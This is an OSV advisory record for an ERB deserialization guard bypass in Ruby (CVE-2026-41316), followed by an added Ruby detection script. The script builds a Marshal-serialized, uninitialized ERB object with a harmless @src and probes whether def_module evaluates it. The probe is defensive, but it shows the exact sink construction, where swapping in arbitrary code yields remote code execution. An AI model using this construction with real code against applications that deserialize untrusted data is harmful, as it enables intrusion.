{"id":"CVE-2026-41316","summary":"ERB has an @_init deserialization guard bypass via def_module / def_method / def_class","details":"ERB is a templating system for Ruby. Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an `@_init` instance variable guard in `ERB#result` and `ERB#run` to prevent code execution when an ERB object is reconstructed via `Marshal.load` (deserialization). However, three other public methods that also evaluate `@src` via `eval()` were not given the same guard: `ERB#def_method`, `ERB#def_module`, and `ERB#def_class`. An attacker who can trigger `Marshal.load` on untrusted data in a Ruby application that has `erb` loaded can use `ERB#def_module` (zero-arg, default parameters) as a code execution sink, bypassing the `@_init` protection entirely. ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4 patch the issue.","aliases":["GHSA-q339-8rmv-2mhv"],"modified":"2026-06-15T12:22:58.514947158Z","published":"2026-04-24T02:35:41.160Z","related":["ALSA-2026:18030","ALSA-2026:18039","ALSA-2026:18065","ALSA-2026:20596","ALSA-2026:20606","ALSA-2026:20614","CGA-p2rw-cf3p-xf66","openSUSE-SU-2026:10609-1"],"database_specific":{"osv_generated_from":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/41xxx/CVE-2026-41316.json","cwe_ids":["CWE-693"],"cna_assigner":"GitHub_M"},"references":[{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/41xxx/CVE-2026-41316.json"},{"type":"ADVISORY","url":"https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41316"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://github.com/ruby/erb","events":[{"introduced":"0"},{"fixed":"b6be29fd0e0f5089447d2f8d18140ae78258621d"},{"introduced":"08b544cdb898b7479f500480bafc1876d19f8bba"},{"fixed":"93450765b5319cfb552a3d9719df137e8fbb75e9"},{"introduced":"8626c822ea8009008fb5884cfc949cbcafbe9680"},{"fixed":"4d2b45e140044f464794c0463d838d5cb4bba96c"}],"database_specific":{"extracted_events":[{"introduced":"0"},{"fixed":"4.0.3.1"},{"last_affected":"= 4.0.4"},{"introduced":"5.0.0"},{"fixed":"6.0.1.1"},{"introduced":"6.0.2"},{"fixed":"6.0.4"}],"source":"AFFECTED_FIELD"}}],"versions":["v4.0.3","v6.0.1","v6.0.3","v6.0.0","v5.1.3","v5.1.2","v5.1.1","v5.1.0","v5.0.3","v5.0.2","v5.0.1","v5.0.0","v4.0.2","v4.0.1","v4.0.0","v3.0.0","v2.2.3","v2.2.2","v2.2.1","v2.2.0"],"database_specific":{"source":"https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2026-41316.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}]}
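The record above describes the mechanism (an ERB object rebuilt by `Marshal.load` never runs `initialize`, so `@_init` is unset; `result`/`run` check it, `def_module`/`def_method`/`def_class` did not) and lists the affected version ranges. The following Ruby script is an added example written for this page, not code from the advisory or the ruby/erb project. It gives a practitioner two checks: `version_affected?` encodes the ranges as I read them from the record's `extracted_events` (below 4.0.3.1, 4.0.4 itself, 5.0.0 up to 6.0.1.1, 6.0.2 up to 6.0.4), and `probe_guard` deserializes a constructed, harmless ERB object whose `@src` is a string literal and reports whether `#result` and `#def_module` evaluate it. On an affected ERB, `#result` raises from the `@_init` guard while `#def_module` evaluates `@src` (here that only defines a no-op method named `erb` on the returned module). The probe assumes that a patched `def_module` rejects the uninitialized object with an exception, as `result` does; the record does not say how the fix is implemented, so any exception is reported as `:blocked`. Nothing here weaponizes the sink.

```ruby
# Added example (not from the advisory or the ruby/erb project): two checks
# for CVE-2026-41316 / GHSA-q339-8rmv-2mhv.
#  1. version_affected?  - compares an ERB gem version against the affected
#     ranges as stated in the record (my reading of its extracted_events).
#  2. probe_guard        - rebuilds an ERB object via Marshal.load with a
#     benign, constructed @src and reports whether #result and #def_module
#     evaluate it. On an affected ERB, #result is stopped by the @_init guard
#     while #def_module still evals @src (here: defines a harmless method).
require "erb"
require "rubygems" # Gem::Version

# Affected ranges derived from the record's extracted_events:
#   [0, 4.0.3.1), [4.0.4, 4.0.4.1), [5.0.0, 6.0.1.1), [6.0.2, 6.0.4)
AFFECTED_RANGES = [
  ["0",     "4.0.3.1"],
  ["4.0.4", "4.0.4.1"],
  ["5.0.0", "6.0.1.1"],
  ["6.0.2", "6.0.4"],
].map { |lo, hi| [Gem::Version.new(lo), Gem::Version.new(hi)] }.freeze

def version_affected?(version)
  v = Gem::Version.new(version)
  AFFECTED_RANGES.any? { |lo, hi| v >= lo && v < hi }
end

# Build the kind of object an attacker's Marshal stream would produce: an ERB
# instance whose @src is attacker-chosen and whose @_init was never set by
# ERB#initialize. ERB.allocate skips initialize, so @_init is simply absent
# (ERB's real @_init is a singleton class, which Marshal cannot dump anyway).
# The template body is a constructed, harmless literal; it is not a payload.
BENIGN_SRC = "'erb-probe'".freeze

def build_probe_payload(src = BENIGN_SRC)
  obj = ERB.allocate
  obj.instance_variable_set(:@src, src)
  Marshal.dump(obj)
end

# Classify how each sink treats the deserialized object.
#   :blocked   - the call raised (the @_init guard, or a patched check)
#   :evaluated - @src reached eval (for def_module: a method named `erb`
#                was defined on the returned module)
def probe_guard(payload = build_probe_payload)
  erb = Marshal.load(payload) # the untrusted-data deserialization sink
  out = { erb_version: ERB.version }

  out[:result] =
    begin
      erb.result(binding)
      :evaluated
    rescue StandardError => e
      out[:result_error] = "#{e.class}: #{e.message}"
      :blocked
    end

  out[:def_module] =
    begin
      mod = erb.def_module
      mod.instance_methods(false).include?(:erb) ? :evaluated : :blocked
    rescue StandardError => e
      out[:def_module_error] = "#{e.class}: #{e.message}"
      :blocked
    end

  out
end

if __FILE__ == $0
  verdict = version_affected?(ERB.version) ? "AFFECTED" : "not affected"
  puts "ERB #{ERB.version}: record's version ranges say #{verdict}"
  probe_guard.each { |k, v| puts "  #{k}: #{v}" }
end
```

Run it with the Ruby whose `erb` you ship; `result: blocked` together with `def_module: evaluated` is the signature of an affected build, since the same uninitialized object is refused by one sink and evaluated by the other. The version table and the runtime probe should agree; if they do not, trust the probe, because distribution backports can carry the fix under an unchanged gem version. Either way, the root sink is `Marshal.load` on untrusted bytes, and the durable fix is to stop deserializing untrusted data rather than to rely on per-class guards.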